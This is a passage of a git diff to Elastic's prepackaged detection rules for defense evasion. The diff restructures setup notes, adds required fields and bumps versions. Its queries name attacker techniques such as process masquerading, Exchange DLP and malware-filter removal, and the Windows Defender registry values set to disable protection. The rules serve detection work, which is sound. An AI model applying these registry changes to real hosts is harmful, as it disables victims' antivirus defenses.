b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_as_elastic_endpoint_process.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Endpoint Security Parent Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name : (\"esensor.exe\", \"elastic-endpoint.exe\") and\n process.parent.executable != null and\n /* add FPs here */\n not process.parent.executable : (\"C:\\\\Program Files\\\\Elastic\\\\*\", \n \"C:\\\\Windows\\\\System32\\\\services.exe\", \n \"C:\\\\Windows\\\\System32\\\\WerFault*.exe\", \n \"C:\\\\Windows\\\\System32\\\\wermgr.exe\")\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.name : (\"esensor.exe\", \"elastic-endpoint.exe\") and\n process.parent.executable != null and\n /* add FPs here */\n not process.parent.executable : (\"C:\\\\Program Files\\\\Elastic\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\services.exe\",\n \"C:\\\\Windows\\\\System32\\\\WerFault*.exe\",\n \"C:\\\\Windows\\\\System32\\\\wermgr.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b41a13c6-ba45-4bab-a534-df53d0cfed6a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -43,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_renamed_autoit.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_renamed_autoit.json index 0e56479211592..2b81cba35eb20 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_renamed_autoit.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_renamed_autoit.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed AutoIt Scripts Interpreter", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\", \"info\") and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_suspicious_werfault_childproc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_suspicious_werfault_childproc.json index 72a0c6824033c..e02e32d8060b0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_suspicious_werfault_childproc.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_suspicious_werfault_childproc.json @@ -15,15 +15,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious WerFault Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"WerFault.exe\" and\n not process.name : (\"cofire.exe\",\n \"psr.exe\",\n \"VsJITDebugger.exe\",\n \"TTTracer.exe\",\n \"rundll32.exe\",\n \"LogiOptionsMgr.exe\") and\n not process.args : (\"/LOADSAVEDWINDOWS\",\n \"/restore\",\n \"RestartByRestartManager*\",\n \"--restarted\",\n \"createdump\",\n \"dontsend\",\n \"/watson\")\n", "references": [ "https://www.hexacorn.com/blog/2019/09/19/silentprocessexit-quick-look-under-the-hood/", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx", "https://blog.menasec.net/2021/01/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_trusted_directory.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_trusted_directory.json index 6605efbaffa02..03b7a8ba575e9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_trusted_directory.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_trusted_directory.json @@ -12,10 +12,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Program Files Directory Masquerading", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.executable : \"C:\\\\*Program*Files*\\\\*.exe\" and\n not process.executable : (\"C:\\\\Program Files\\\\*.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\", \"C:\\\\Users\\\\*.exe\", \"C:\\\\ProgramData\\\\*.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_werfault.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_werfault.json index a08e3040c6c95..399087dc7c090 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_werfault.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_masquerading_werfault.json @@ -21,6 +21,48 @@ "https://www.hexacorn.com/blog/2019/09/20/werfault-command-line-switches-v0-1/", "https://app.any.run/tasks/26051d84-b68e-4afb-8a9a-76921a271b81/" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6ea41894-66c3-4df7-ad6b-2c5074eb3df8", "severity": "medium", @@ -49,5 +91,5 @@ } ], "type": "eql", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_dlp_policy_removed.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_dlp_policy_removed.json index f9f465ef3ee18..68371e6986647 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_dlp_policy_removed.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_dlp_policy_removed.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange DLP Policy Removed", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-DlpPolicy\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-dlppolicy?view=exchange-ps", "https://docs.microsoft.com/en-us/microsoft-365/compliance/data-loss-prevention-policies?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "60f3adec-1df9-4104-9c75-b97d9f078b25", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_policy_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_policy_deletion.json index 0f2c612324234..b688d851b29d5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_policy_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_policy_deletion.json @@ -14,13 +14,47 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Malware Filter Policy Deletion", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-MalwareFilterPolicy\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterpolicy?view=exchange-ps" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_rule_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_rule_mod.json index 7af0c1ea45d2a..46c71f7b84ed3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_rule_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_malware_filter_rule_mod.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Malware Filter Rule Modification", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-MalwareFilterRule\" or \"Disable-MalwareFilterRule\") and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterrule?view=exchange-ps", "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-malwarefilterrule?view=exchange-ps" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_safe_attach_rule_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_safe_attach_rule_disabled.json index 38a7edda3a4e9..4c9e9b914b73a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_safe_attach_rule_disabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_exchange_safe_attach_rule_disabled.json @@ -14,13 +14,47 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Safe Attachment Rule Disabled", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeAttachmentRule\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safeattachmentrule?view=exchange-ps" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "03024bd9-d23f-4ec1-8674-3cf1a21e130b", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -49,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_mailboxauditbypassassociation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_mailboxauditbypassassociation.json index ae9512e52c705..a3413ed4e6c94 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_mailboxauditbypassassociation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_365_mailboxauditbypassassociation.json @@ -14,13 +14,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "O365 Mailbox Audit Logging Bypass", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Set-MailboxAuditBypassAssociation and event.outcome:success\n", "references": [ "https://twitter.com/misconfig/status/1476144066807140355" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "675239ea-c1bc-4467-a6d3-b9e2cc7f676d", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -56,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_defender_tampering.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_defender_tampering.json index da2a1eb166dd5..97278f5869220 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_defender_tampering.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_microsoft_defender_tampering.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Windows Defender Tampering", - "note": "## Triage and analysis\n\n### Investigating Microsoft Windows Defender Tampering\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple\nenvironments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for modifications that disable Windows Defender features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine which features have been disabled, and check if this operation is done under change management and approved\naccording to the organization's policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity,\nthe configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting),\nand no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Microsoft Windows Defender Tampering\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple\nenvironments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for modifications that disable Windows Defender features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine which features have been disabled, and check if this operation is done under change management and approved\naccording to the organization's policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity,\nthe configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting),\nand no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where event.type in (\"creation\", \"change\") and\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableRealtimeMonitoring\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableIntrusionPreventionSystem\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableScriptScanning\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\EnableControlledFolderAccess\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableIOAVProtection\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Reporting\\\\DisableEnhancedNotifications\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\SpynetReporting\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\SubmitSamplesConsent\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableBehaviorMonitoring\" and\n registry.data.strings : (\"1\", \"0x00000001\"))\n", "references": [ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", @@ -27,8 +27,26 @@ "https://www.tenforums.com/tutorials/3569-turn-off-real-time-protection-microsoft-defender-antivirus.html", "https://www.tenforums.com/tutorials/99576-how-schedule-scan-microsoft-defender-antivirus-windows-10-a.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -56,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_misc_lolbin_connecting_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_misc_lolbin_connecting_to_the_internet.json index 9e8519cb576ef..b6ca6ace3c414 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_misc_lolbin_connecting_to_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_misc_lolbin_connecting_to_the_internet.json @@ -16,6 +16,28 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "63e65ec3-43b1-45b0-8f2d-45b34291dc44", "severity": "low", @@ -37,7 +59,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/" } ] @@ -53,5 +75,5 @@ } ], "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_modify_environment_launchctl.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_modify_environment_launchctl.json index aa0efa290c4f6..f55e4aefcb4c7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_modify_environment_launchctl.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_modify_environment_launchctl.json @@ -11,10 +11,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "Modification of Environment Variable via Launchctl", - "query": "event.category:process and event.type:start and\n process.name:launchctl and\n process.args:(setenv and not (JAVA*_HOME or\n RUNTIME_JAVA_HOME or\n DBUS_LAUNCHD_SESSION_BUS_SOCKET or\n ANT_HOME or\n LG_WEBOS_TV_SDK_HOME or\n WEBOS_CLI_TV or\n EDEN_ENV)\n ) and\n not process.parent.executable:(\"/Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin\" or\n 